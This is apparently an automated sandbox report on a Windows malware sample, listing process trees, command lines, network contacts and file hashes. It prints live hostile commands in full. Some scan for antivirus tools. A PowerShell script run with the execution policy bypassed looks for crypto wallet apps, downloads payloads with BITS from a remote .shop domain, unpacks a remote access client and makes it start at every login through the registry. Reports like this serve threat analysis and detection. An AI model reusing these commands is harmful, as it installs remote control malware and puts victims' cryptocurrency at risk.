PID 1496 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 4180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1496 wrote to memory of 4180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1496 wrote to memory of 4180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1496 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 4172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 1496 wrote to memory of 4172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 1496 wrote to memory of 4172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 1496 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1496 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1496 wrote to memory of 5040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 4172 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4172 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4172 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 1160 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 1160 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 1160 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4172 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\0VYTBW.pif
PID 4172 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\0VYTBW.pif
PID 4172 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\0VYTBW.pif
PID 4508 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4508 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe

"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Coordination Coordination.bat & Coordination.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 208231

C:\Windows\SysWOW64\findstr.exe

findstr /V "pantiescurverefrigeratorcapital" Portfolio

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Canada + ..\Dv + ..\Admissions + ..\Strand + ..\Boring + ..\Synthetic + ..\Evaluation O

C:\Users\Admin\AppData\Local\Temp\208231\War.pif

War.pif O

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\K1HDCVMZ3CHA6WL98LCQ54O6LSAEU.ps1"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc $ e d H H f = ' h K c U : \ s o f t W a R e \ c l a S s e s \ ' ;   $ w A a j = $ e n V : L O c A l a P p D A t a + ' \ p R O g r A M S \ ' ;   $ 9 v x n 5 = ( G E T - W m I o B j E c T   - C L a s S   W i N 3 2 _ C o m p U t e r S Y s t E m ) . p A R T O f d O M A I N ;   $ V v p S = 0 ;   $ V 4 t o n = ' c : \ P r o G r A M   F i L e s \ ' ;   $ r 5 S u i = ' H K L M : \ S O f t w a R E \ c L A s S E S \ ' ;   $ E k Q d = ' h k C U : \ s O f t W A r E \ ' ;   $ Y M c z = @ (   $ v 4 t O N + ' b I T b O x \ b I t b o x . E X E ' ;   $ W A a j + ' C Y p h E r o C K   C Y S y N C \ C y p H e R O C K   C Y s y n C . E X e ' ;   $ E d H h f + ' k E e p k e Y ' ;   $ W A a J + ' k E E v O - W a L l e T \ K E E v O   l i n K . e X e ' ;   $ V 4 T o N + ' l e D g e r   l I V e \ L e d g e R   l I v e . E x e ' ;   $ e k Q d + ' b I T B o X a p P ' ;   $ w A A j + ' T R E Z O R   S U i T e \ T R E z o r   S U I T E . e X E ' ;   $ w a a j + ' R a b B y - d E S K t O p \ r A b B y   D e s K T o p . E X E ' ;   $ E K q d + ' m I c R o S o f T \ W i N D O w S \ c u R R e N t V E r s i O n \ u N i n s t A L L \ B i t b o X A P P ' ;   $ R 5 s U I + ' l E d g e R l i V E ' ;   $ E D h H f + ' a o p p ' ;   $ E D h H F + ' T R e Z O r s U I t E ' ;   $ v 4 T o N + ' b C   V A U L t \ B c V a U L T . E X e ' ;   $ r 5 S u I + ' B C v a u l t ' ;   $ W a a j + ' K e e p K e Y - D E S k t O P \ K E E p k E y   D e s k T o P . e x E ' ;   $ E K q D + ' r E A L   s e c u r i t Y \ b C v a u L t ' ;   $ E d h h F + ' K e E V O ' ;   $ E D H h F + ' L i Q U i d n e t W o r k ' ;   $ E d H H F + ' C Y P h E r O C K ' ;   $ e D H H F + ' o n E k E Y - w A l l e T ' ;   $ v 4 t o N + ' B L o c k S T r e a m \ b l O C K S t r e A M   g r E E n \ B L o C K S t R e a M   G R E e n . e X e ' ;   $ V 4 t O N + ' O n e K E Y \ o n E k e y . e x e ' ;   ) ;   $ h N o z = $ Y m C Z . l E N G T h ;   i F   ( $ 9 v x N 5 )   { $ v v p S = 1 }   E L s e   {   f o r   ( $ M 9 p w A = 0 ;   $ m 9 P w a   - L t   $ H N O z   - a N D   $ v V P S   - E q   0 ;   $ M 9 P w a + + )   {   I F   ( t E s T - p a t h   $ y M C Z [ $ m 9 P w a ] )   { $ V v P s = 1 } ; } ; } ;   I f   ( $ v v p s   - e q   1 )   {   C h d i R   $ E n v : A P P d A T a ;   $ R R R E e f H G = g e t - c O m m a n D   E x p A n D - a R C H I v E   - E R r O R A c t I o n   s i L E N T l y c O N t I n U E ;   $ t l e Q r Y = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 4 n d . z i p ' ;   $ V j r F t C g G = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 2 n d . z i p ' ;   $ b E z g j v Q I = ' v d f o r 4 h q . z i p ' ;   $ y X C P e M Q R = G C M   S t a R t - b i t s T R A n S f E R   - E r R o R a C T I O N   s i L e N T l y C O n t I N U e ;   $ 8 G Q 9 n t = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 3 n d . z i p ' ;   $ 8 T g q 3 E 5 = ' 3 q o 3 F c O . z i p ' ;   $ g G B D r n l = ' S m a r t D e f r a g T o o l ' ;   $ J f C i n G = ' 1 a K H x P B . z i p ' ;   [ N e t . s e r v i c e p O I N T m A N a G e r ] : : S E c U R i T y P r O t o C O l   =   [ N e t . S e c U r i T y p r O t o c o l t Y P e ] : : t L s 1 2 ;   $ u F G 9 b 7 j z = ' m A L l Q A . z i p ' ;   $ b 8 7 N 9 u = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 1 n d . z i p ' ;   $ U p x e w 6 F = " $ e N V : a P P D A t a \ $ 8 T g q 3 E 5 " ;   $ t j e 6 g 3 = $ E N V : a p P d A t A ,   $ b E z g j v Q I   - j o i N   ' \ ' ;   $ 3 s U H E X o = " $ E N v : a P P d a T a \ $ J f C i n G " ;   $ 4 5 Y J W y B = " { 0 } \ { 1 } "   - f   $ E N v : a P P d a T a ,   $ u F G 9 b 7 j z ;   $ A r M X I r Y v = " b i t s a D m I N . e X e   / T r A n s f E r   6 D r y 6 h p o   / D O w n l O A D   / P R i O r I T Y   n o R M a l   $ V j r F t C g G   $ U p x e w 6 F " ;   $ 1 m p h u T S i = " $ E n V : a p p D a t A \ $ g G B D r n l " ;   $ C K g l d V = " b i T S A d m i N . E x E   / t R a N s f e r   0 m 1 Y s L 7   / d O w n L o A d   / P r I o r I T Y   N o R m A l   $ 8 G Q 9 n t   $ t j e 6 g 3 " ;   $ u E x Z 6 R P D = ' b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   ' + $ b 8 7 N 9 u + '   ' + $ 3 s U H E X o ;   $ p F 7 H 5 J U = " b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   { 0 }   { 1 } "   - f   $ b 8 7 N 9 u ,   $ 4 5 Y J W y B ;   I f   ( $ R R R E e f H G )   {   I F   ( $ y X C P e M Q R )   {   S t a r t - B I T S t r a N S f e R   - S o U r c e   $ V j r F t C g G   - D e s t I n A t I O n   $ U p x e w 6 F ;   s T a r t - B I T s t R A N S F E R   - s O u R c E   $ 8 G Q 9 n t   - d E S T i n A T i o n   $ t j e 6 g 3 ;   s T A r t - b I T S t r A N S f E R   - s o U r c E   $ b 8 7 N 9 u   - D E s T I N a t I O N   $ 3 s U H E X o ;   s T A R T - B i T s t R a n S F E r   - s O u R c E   $ t l e Q r Y   - D E s T i n a t i o N   $ 4 5 Y J W y B ;   }   E l S E   { i E X   - c o m m a N D   $ u E x Z 6 R P D ;   I E X   - C o m m A n D   $ p F 7 H 5 J U ;   i e x   - c o m m a n d   $ A r M X I r Y v ;   &   $ C K g l d V ;   }   E x p A N D - A r c h i V e   - P A T h   $ 4 5 Y J W y B   - D e S t I N a T I o n P a t h   $ 1 m p h u T S i ;   E x p A N D - a R c h i V E   - P a t H   $ t j e 6 g 3   - d e s t i n a T I o N p a t h   $ 1 m p h u T S i ;   E x P A N d - A R C H i v E   - p A t H   $ 3 s U H E X o   - d E S T i n a T i O N p A t H   $ 1 m p h u T S i ;   e x P A n d - A r C h i V e   - p a t h   $ U p x e w 6 F   - D e S T i n a t i o N p A t H   $ 1 m p h u T S i ;   R m   - P a T h   $ t j e 6 g 3 ;   R D   - p A T H   $ U p x e w 6 F ;   R D   - p A t H   $ 4 5 Y J W y B ;   r e M O v e - I t e m   - P A T h   $ 3 s U H E X o ;   }   E L S E   {   $ Z A P P f t = @ ( ' p c i c a p i . d l l ' ,   ' c l i e n t 3 2 . i n i ' ,   ' T C C T L 3 2 . D L L ' ,   ' n s m _ v p r o . i n i ' ,   ' N S M . L I C ' ,   ' H T C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' n s k b f l t r . i n f ' ,   ' P C I C H E K . D L L ' ,   ' P C I C L 3 2 . D L L ' ,   ' c l i e n t 3 2 . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ) ;   n i   - P A T h   $ E n v : a P p d A t A   - n A m e   $ g G B D r n l   - i T e M T y P e   ' d i r e c t o r y ' ;   $ g 1 i 5 r x B = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n d / ' ;   I F   ( $ y X C P e M Q R )   {   $ Z A P P f t   |   F o R E A c h - O B j E C t   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = j O I N - p A t h   - P A t h   $ 1 m p h u T S i   - c H i l D P a T h   $ _ ;   s t a R t - b I T S t r a n S F E R   - s O u r C e   $ h E V T G u q o   - d E s T i n A T i o N   $ S M J K N P ;   } ; }   e L S E   {   $ Z A P P f t   |   f o R E a C H - o B J E C T   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = $ 1 m p h u T S i ,   $ _   - j O I N   ' \ ' ;   $ p R l r a a Z C = ' B i t S a d m I N . e x E   / t r A n S f E r   6 L P t 8 K 2 g   / d o W n l o A d   / P R I O R I T y   N O r M A L   ' + $ h E V T G u q o + '   ' + $ S M J K N P ;   I E X   - C o m m A n D   $ p R l r a a Z C ; } ;   } ;   } ;   $ y F h z F L = G I   $ 1 m p h u T S i   - f o r C e ;   $ y F h z F L . a T T R i b u t E s = ' H i d d e n ' ;   C h d i R   $ 1 m p h u T S i ;   $ X C U F g c q = " $ 1 m p h u T S i \ c l i e n t 3 2 . e x e " ;   N E W - I t E m p R o p e R T y   - P a t H   ' H K C u : \ s o F T w A R e \ M I C r o s o F t \ w i N D O W S \ c U R r E n T V E R s I O N \ r u n '   - n A m e   $ g G B D r n l   - v a l U e   $ X C U F g c q   - P r O P E r t y t y p e   ' S t r i n g ' ;   S t a r t - P R O C e S S   c l I E n t 3 2 . E X e ;   } ; 

C:\Users\Admin\AppData\Roaming\0VYTBW.pif

"C:\Users\Admin\AppData\Roaming\0VYTBW.pif" "C:\Users\Admin\AppData\Roaming\KHOIE0.vsd"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 fiuflJZlSGqtte.fiuflJZlSGqtte udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 toleratedbaybo.cyou udp
US 104.21.38.229:443 toleratedbaybo.cyou tcp
US 8.8.8.8:53 229.38.21.104.in-addr.arpa udp
US 104.21.38.229:443 toleratedbaybo.cyou tcp
US 104.21.38.229:443 toleratedbaybo.cyou tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 104.21.38.229:443 toleratedbaybo.cyou tcp
US 104.21.38.229:443 toleratedbaybo.cyou tcp
US 104.21.38.229:443 toleratedbaybo.cyou tcp
US 8.8.8.8:53 cdn1.pixel-story.shop udp
US 172.67.185.54:443 cdn1.pixel-story.shop tcp
US 8.8.8.8:53 pixelpalette.shop udp
US 172.67.191.17:443 pixelpalette.shop tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 54.185.67.172.in-addr.arpa udp
US 8.8.8.8:53 17.191.67.172.in-addr.arpa udp
US 8.8.8.8:53 mindfusteps.shop udp
MD 213.159.73.34:443 mindfusteps.shop tcp
US 8.8.8.8:53 34.73.159.213.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Coordination

MD5 485f89cfaf1420f132a95a0b7c6e6305
SHA1 efb827df52282fb79b5f44ec9e63b8e5a47c37e1
SHA256 eea03a384671dd1323b8d853ed49df8a27dbc2a706400437bd8d48e6076453bd
SHA512 116c823265a05c4b338e94204ce48267f112d12e55a8473fc05426af0a476c37fc272408eb805d117f6e8cab059fbd708c6158bd041ff3e9a8a430a577cc669b

C:\Users\Admin\AppData\Local\Temp\Portfolio

MD5 4d06e14fe2951aa0024c22936e5f531b
SHA1 c718b677b65d246033898069459f078a00f650be
SHA256 0e3ab81f015e71af9b43ed7fd5854c3560c6ce09443b0cbffb0ac6c10d93d918
SHA512 5bf78bc3bfce3553dff1e80ec3fef4c2589e618b1a3ac2723ed89a24c5fdd78b5e80f2bc778346f21b2c5f9750c00ea7a5ba9b3bd42f9f9f804ef838b92c887c

C:\Users\Admin\AppData\Local\Temp\Shoppers

MD5 52620731f9486725cceaf71e1a45cc9f
SHA1 0d166e1027ae7903dced0abe3570f71516fc5baf
SHA256 73e5301ad4b4aea78e34de20b8088641fc1d04b1444ed4ecbc6da47603d87cc2
SHA512 b4546af693050332c0477dd38b5e816ac2fe490d550ae296ef759714c33c96a648e4ed96294b777392bbfaf6fba876460f78c5730ecc61ef801f45cdb298dc36

C:\Users\Admin\AppData\Local\Temp\Canada

MD5 d426ef537d4e36651d372eb67de61c71
SHA1 c00ecae6e973056c698680c714bd8c932df53c56
SHA256 f0919fbdae23b005eb403344118d8509a316037ae5460484d81d8452a74812e3
SHA512 d042b71e1badef416e42f8c1235163ed7a71ae5d3cd897aca1dbb2b344769428b37e71e7b9b1a6c0ffbfdab8222eff893fc28415389b5afdcd262bd7eb7a40d6

C:\Users\Admin\AppData\Local\Temp\Dv

MD5 367fecb6d4d73f3e22e2186fbe91f216
SHA1 2bce21a05dfeee536cda999fbaa73c1af28b9d86
SHA256 11741c20239ea1dd1c392abda3ee226e16ad2fd004f8fe344d2d068c8e20ef62
SHA512 09009011345cc71715ba9ff975d0d304d3160090281a3c9672187b2f2c3eeab3653c31849f1306ae3d77459e0de8f63ce2037c0d330c16c361491d32b089b315

C:\Users\Admin\AppData\Local\Temp\Admissions

MD5 b9675af1aafe9bbc3397bb840117840a
SHA1 e0fae0f4ef594f472216025e838fadbb2aa0b861
SHA256 875276f91f4aa27b3d23da12c88e94871fe7ed6401ec8f4657b4f6be2f33a01d
SHA512 70a24225488d1e41f36244d7811766e2379b8c90ea57d1fb5d33b54e2f62e032002a7c2e45aeb8f47e45840a6cc16cfed5680f88e71de68b3a15af73db24a5e6

C:\Users\Admin\AppData\Local\Temp\Strand

MD5 cd7bd19edb3ded5365bab0e5956309db
SHA1 1e0d4ba49a9592faebcfa4119f523ca7735108bb
SHA256 84078ab15033945d702802a013fbc3142b56db1371ff79ba1107df211300d803
SHA512 574476aaf140810d1cfd9a99187097d68c024c89c57f82a2399e2933f46e854989364759e35474048eaad35b817c63d05e19ed75393ec893bbaf57f7061d96e4

C:\Users\Admin\AppData\Local\Temp\Boring

MD5 10e29c8822f7da216b45a11d3ee0eda8
SHA1 23e62cb3f04cd00b22fe54a65e3b81518c78e614
SHA256 4a4f9151f243bd1eca82a0721bae4136e37c3835324991516c62fc70f99dcb05
